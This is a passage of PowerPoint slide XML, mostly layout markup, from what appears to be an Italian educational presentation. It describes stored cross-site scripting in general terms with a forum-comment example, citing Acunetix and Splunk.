                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="3273873" cy="5509302"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="1731709"/>
            <a:ext cx="5971851" cy="4915002"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="6553336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 13" id="13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="9448" t="0" r="9448" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="6553336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="6850470"/>
            <a:ext cx="5971851" cy="1704821"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="2273094"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 15" id="15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="29681" r="0" b="27469"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="2273094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10309798" y="1276167"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1944265" y="914400"/>
            <a:ext cx="6922007" cy="2644775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Cross-Site Scripting: XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 20" id="20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1365791" y="4682954"/>
            <a:ext cx="1707108" cy="995813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="5698433"/>
            <a:ext cx="1422590" cy="555419"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2246"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1604">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Stored XSS (Persistente)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="6653902"/>
            <a:ext cx="8843305" cy="1868805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questa tecnica è considerata una delle più dannose perché lo script malevolo viene memorizzato permanentemente nel server dell'applicazione (ad esempio, in un database).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="2520"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Quando gli utenti accedono alla pagina infetta, eseguono involontariamente lo script. Viene spesso utilizzata nei forum, nei campi di commento e nei messaggi degli utenti​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId6" tooltip="https://www.acunetix.com/websitesecurity/xss/"/>
              </a:rPr>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​​ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
                <a:hlinkClick r:id="rId7" tooltip="https://www.splunk.com/en_us/blog/learn/cross-site-scripting-xss-attacks.html"/>
              </a:rPr>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>)​.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4006614"/>
            <a:ext cx="8685095" cy="270911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2213"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1581" spc="542">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>PERCENTUALE DI UTILIZZO (DATI AGGIORNATI AL 2023)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 24" id="24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="4420400"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 25" id="25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 26" id="26"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 27" id="27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1349839" y="6444352"/>
            <a:ext cx="8843305" cy="47625"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6292158" cy="33886"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 28" id="28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6292159" cy="33886"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="33886" w="6292159">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6292159" y="33886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="33886"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 29" id="29"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6292158" cy="62461"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 30" id="30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1508050" y="3851440"/>
            <a:ext cx="8685095" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6179589" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 31" id="31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="6179589" cy="71118"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="71118" w="6179589">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6179589" y="71118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="71118"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 32" id="32"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="6179589" cy="99693"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 33" id="33"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="3297547" y="5059306"/>
            <a:ext cx="6895598" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold Italics"/>
                <a:ea typeface="Open Sans Bold Italics"/>
                <a:cs typeface="Open Sans Bold Italics"/>
                <a:sym typeface="Open Sans Bold Italics"/>
              </a:rPr>
              <a:t>Esempio:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Italics"/>
                <a:ea typeface="Open Sans Italics"/>
                <a:cs typeface="Open Sans Italics"/>
                <a:sym typeface="Open Sans Italics"/>
              </a:rPr>
              <a:t> Un attaccante inserisce uno script malevolo in un commento su un forum. Ogni volta che un utente visualizza il commento, lo script viene eseguito nel suo browser.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3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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6" id="6"/>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7" id="7"/>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05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13686739" y="0"/>
            <a:ext cx="4601261" cy="7702881"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3273873" cy="5480727"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="3273873" cy="5480727"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="5480727" w="3273873">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3273873" y="5480727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5480727"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 11" id="11"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="3273873" cy="5509302"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="1731709"/>
            <a:ext cx="5971851" cy="4915002"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="6553336"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 13" id="13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="9448" t="0" r="9448" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="6553336"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10700814" y="6850470"/>
            <a:ext cx="5971851" cy="1704821"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7962468" cy="2273094"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 15" id="15"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="29681" r="0" b="27469"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="7962468" cy="2273094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 16" id="16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="10309798" y="1276167"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 17" id="17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 18" id="18"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1944265" y="914400"/>
            <a:ext cx="6922007" cy="2644775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
